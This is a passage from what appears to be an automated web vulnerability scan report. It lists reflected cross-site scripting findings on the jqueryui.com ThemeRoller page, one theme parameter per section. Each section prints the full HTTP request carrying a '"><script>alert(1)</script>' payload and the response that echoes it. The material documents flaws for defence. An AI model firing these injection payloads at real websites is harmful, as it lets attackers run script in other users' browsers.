GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=36363644a5d"><script>alert(1)</script>ddc6b19163f&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=36363644a5d"><script>alert(1)</script>ddc6b19163f&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOve
...[SNIP]...

4.163. http://jqueryui.com/themeroller/ [fcHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb649"><script>alert(1)</script>78dbef2ed8c was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405eb649"><script>alert(1)</script>78dbef2ed8c&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
g&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405eb649"><script>alert(1)</script>78dbef2ed8c&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight
...[SNIP]...

4.164. http://jqueryui.com/themeroller/ [ffDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks: in the response below it lands in the href of the <link rel="stylesheet"> tag that passes the theme parameters on to /themeroller/css/parseTheme.css.php. The payload 12fd4"><script>alert(1)</script>29d7d472bd3 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response; the leading "> closes the href attribute and the <link> tag, so the <script> element that follows is parsed as page markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif12fd4"><script>alert(1)</script>29d7d472bd3&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif12fd4"><script>alert(1)</script>29d7d472bd3&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorCont
...[SNIP]...

4.165. http://jqueryui.com/themeroller/ [fsDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks: in the response below it lands in the href of the <link rel="stylesheet"> tag that passes the theme parameters on to /themeroller/css/parseTheme.css.php. The payload e4afc"><script>alert(1)</script>59f5feaeb48 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response; the leading "> closes the href attribute and the <link> tag, so the <script> element that follows is parsed as page markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1eme4afc"><script>alert(1)</script>59f5feaeb48&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1eme4afc"><script>alert(1)</script>59f5feaeb48&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_
...[SNIP]...

4.166. http://jqueryui.com/themeroller/ [fwDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks: in the response below it lands in the href of the <link rel="stylesheet"> tag that passes the theme parameters on to /themeroller/css/parseTheme.css.php. The payload 83189"><script>alert(1)</script>49897045505 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response; the leading "> closes the href attribute and the <link> tag, so the <script> element that follows is parsed as page markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold83189"><script>alert(1)</script>49897045505&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120191

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold83189"><script>alert(1)</script>49897045505&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTe
...[SNIP]...

4.167. http://jqueryui.com/themeroller/ [iconColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdabe"><script>alert(1)</script>92b58c8d02c was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08cdabe"><script>alert(1)</script>92b58c8d02c&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08cdabe"><script>alert(1)</script>92b58c8d02c&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08
...[SNIP]...

4.168. http://jqueryui.com/themeroller/ [iconColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae8b9"><script>alert(1)</script>aee3e277a5 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222ae8b9"><script>alert(1)</script>aee3e277a5&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120253

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
der=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222ae8b9"><script>alert(1)</script>aee3e277a5&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpac
...[SNIP]...

4.169. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82c16"><script>alert(1)</script>7fb96a46603 was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c0882c16"><script>alert(1)</script>7fb96a46603&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c0882c16"><script>alert(1)</script>7fb96a46603&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=
...[SNIP]...

4.170. http://jqueryui.com/themeroller/ [iconColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c249f"><script>alert(1)</script>98f0b51fcf6 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27ac249f"><script>alert(1)</script>98f0b51fcf6&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Highlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27ac249f"><script>alert(1)</script>98f0b51fcf6&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thickness
...[SNIP]...

4.171. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5287f"><script>alert(1)</script>c5daa8ea141 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

